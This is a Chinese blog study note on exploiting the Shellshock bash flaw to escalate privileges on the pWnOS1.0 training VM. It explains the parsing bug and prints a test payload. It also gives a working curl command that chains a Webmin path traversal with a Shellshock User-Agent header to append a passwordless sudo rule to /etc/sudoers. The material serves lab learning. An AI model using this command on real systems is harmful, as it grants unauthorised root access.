学习笔记 | Shellshock漏洞利用提权

最新推荐文章于 2024-04-27 23:11:41 发布
最新推荐文章于 2024-04-27 23:11:41 发布
阅读量359 收藏
点赞数
文章标签: chrome 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57133419/article/details/132205314
版权

漏洞存在于bash<4.3之前的版本。

Bash解释器在解释环境变量时,不仅仅是简单地替换变量的值,它还会对变量的内容进行解释,包括其中可能存在的特殊字符和命令。这就是为什么插入恶意函数之后,这些函数能够被执行的原因。

在Shellshock漏洞中,攻击者可以通过在环境变量中插入恶意代码,例如函数定义,然后触发Bash解释器执行这些代码。这是因为Bash解释器在解释环境变量时,并不仅仅是将变量的值替换为文本,而是会尝试解释其中的特殊字符和命令。

如果在环境变量中插入了以下内容:

env FUNC='() { echo "66666!"; }; echo "shellshock" '

 当Bash解释器遇到这个环境变量时,它会尝试将 FUNC 定义为一个函数。然后,如果有任何触发条件,比如执行后面的命令时,Bash会执行这个恶意函数,并输出语句。这样可以证明漏洞存在。

 在提权之前,先在目标主机写一个文件baji.cgi其中写入#!/bin/bash,这个文件可以用来触发bash解释器。之后添加执行权限。

 这次的pWnOS1.0靶机有任意文件读取漏洞,所以只需要在读取时添加

/bin/echo "vmware ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers

去提权就行,

借助漏洞利用的脚本直接更改脚本内容,发现不行,我不会改perl语言。看了别的大佬是借助核心代码构造url并用curl命令去读取。

curl http://192.168.230.129:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/home/vmware/baji.cgi -A '() { :; }; /bin/echo "vmware ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers'

提权成功

 

 

金瓜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
详解ShellShock 漏洞复现原理,内附ShellShock的修复方法
Anprou的博客
05-31 6671
Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 452
Shellshock远程命令注入
shellshocker:ShellShock Live游戏的程序,用于计算击中敌人所需的角度和强度
05-12
Shellshocker
009 - VulnHub靶机:pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞+shellshock漏洞
最新发布
Windmill_的博客
04-27 1582
pWnOS1.0学习笔记——文件包含+密码破解+Perl Cgi反弹shell + linux内核漏洞+shellshock漏洞
LINUX漏洞复现篇之ShellShock漏洞
xf555er的博客
12-06 1035
ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意Shell命令此漏洞在调用BashShell之前使用payload创建环境变量, 这些环境变量包含Shell代码, 在Shell被调用后代码会被执行bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令Vul
【安全】Shellshock漏洞
01-30 452
Shellshock利用了linux环境变量解析问题,进而可以进行针对正常应用启动shell时进行劫持。通过该漏洞,可以实现CGI环境下的RCE,以及针对特应用的。 可以简单理解为,当环境变量可控时,均存在攻击场景。如此看来,该漏洞危害极大,攻击场景非常广。
命令注入之Shellshock漏洞复现(CVE-2014-6271)
SmileAssassn的博客
01-23 558
命令注入之Shellshock漏洞复现(CVE-2014-6271)
Linux手法总结以及 Linuxexp集合
02-22
sudo是攻击者利用sudo配置错误或未授访问进行的。sudo允许非root用户以其他用户(通常是root)的身份执行命令,如果配置不当,可能导致限滥用。确保sudo配置严格,仅允许特定的命令和用户使用sudo,并...
shellshock 漏洞 bash漏洞rpm包升级包
09-28
研究人员周四发布警告称 黑客已经开始利用最新的“Shellshock”电脑漏洞 借助蠕虫病毒扫描有漏洞的系统 然后感染这些 redhat 6 5以上版本32 位64位 升级包
ShellShockHunter:这是测试漏洞Shellshock的简单工具
05-05
Shellshock,也称为Bashdoor,是Unix Bash shell中的一系列安全漏洞,第一个漏洞已于2014年9月24日公开。Shellshock可能使攻击者导致Bash执行任意命令并获得对许多Internet-使用Bash处理请求的面向服务(例如Web...
shellshock漏洞的redhat最新补丁及说明
10-04
Shellshock漏洞,全称为Bash Shell漏洞,是2014年发现的一个重大安全漏洞,影响了广泛使用的Unix-like操作系统,包括Linux和Mac OS X。这个漏洞源于Bash shell,一个广泛使用的命令行解释器,它允许用户通过命令行...
Bash漏洞-Shellshock浅析.pdf
07-10
【Bash漏洞Shellshock】 Bash漏洞,又称为Shellshock,是指在2014年发现的一种严重安全漏洞,影响了广泛使用的Bash shell程序。Bash是Unix-like操作系统,包括Linux和Mac OS X的默认命令行解释器。这个漏洞的存在...
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 2997
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是限不足的原因了,那我们就修改一下限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
Linux Shell Shock漏洞利用和实战
Python_0011的博客
03-06 421
Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。这就说明如果real uid 和effective uid相同的话,定义在环境变量中的内容 在该程序中任然有效,但是两个uid如果不同,环境变量失效,就无法发动攻击了,这可以从bash的源代码中得到印证。可以尝试,如果这段代码被删除,那么就无法成功。Bash读取了环境变量,在定义foo之后就直接调用了后面的函数,一旦调用bash,自定义语句就直接触发。
vulhub漏洞复现之bash(Shellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1245
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者供环境变量以利用漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
Vulhub靶场-shellshock漏洞复现
weixin_53696027的博客
06-02 224
通过Vulhub复现shellshock漏洞
黑客必备!Linux Shell Shock漏洞利用和实战
logic1001的博客
04-15 1096
漏洞介绍Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授的情况下访问计算机系统。——摘自维基百科环境搭建1、 以root限安装4.1版本的bansh。下载地址:3、链接5、 如果上一步输出vulnerable,那么让/bin/sh指向/bin/bash。
漏洞分析——shellshock实验
郭同学如是说
04-15 1779
Shellshock Attack Lab 前导知识 SHELL:命令行界面的解释器 Linux下常见Shell: Bourne Again Shell(/bin/bash) C Shell(/usr/bin/csh) K Shell(/usr/bin/ksh) Bourne Again Shell(/bin/bash) 查看目前使用的shell是否是/bin/bash: seed@ubuntu:/usr/lib/cgi-bin$ echo $SHELL /bin/bash vim编
【靶场补充】项目十二补充(shellshock原理)
人间体佐菲的博客
09-12 673
shellshock
shellshock漏洞利用
04-03
Shellshock漏洞利用方式有多种,以下是其中一种常见的利用方法: 1. 构造恶意环境变量:攻击者可以通过在HTTP请求的头部或者CGI脚本中注入恶意的环境变量来触发Shellshock漏洞。例如,攻击者可以在User-Agent字段...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值